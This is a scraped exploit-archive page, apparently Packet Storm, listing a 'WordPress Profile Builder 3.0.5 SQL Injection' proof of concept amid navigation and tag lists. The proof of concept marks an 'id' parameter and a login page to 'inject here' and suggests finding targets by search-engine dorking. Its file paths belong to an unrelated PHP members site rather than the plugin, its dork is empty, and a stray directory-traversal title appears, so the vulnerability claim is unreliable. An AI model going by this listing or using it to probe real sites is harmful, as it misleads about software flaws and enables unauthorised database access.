*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 3.0.8 Directory Traversal

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

**WordPress Profile Builder 3.0.5 SQL Injection**

Posted Jan 13, 2023

Authored by indoushka

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | dd2a00364eee556c9e3981aef19bd8de262365e971b4b9c66b65ec44ec825637

Download | Favorite | View

**WordPress Profile Builder 3.0.5 SQL Injection**

    ====================================================================================================================================| # Title     : WordPress profile builder 3.0.5 SQL Injection Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://fr.wordpress.org/plugins/profile-builder/                                                                  |  | # Dork      : "  "                                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/member_detail.php?id=1772 <====| inject here[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/login.php <====| LoginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

Tag

#google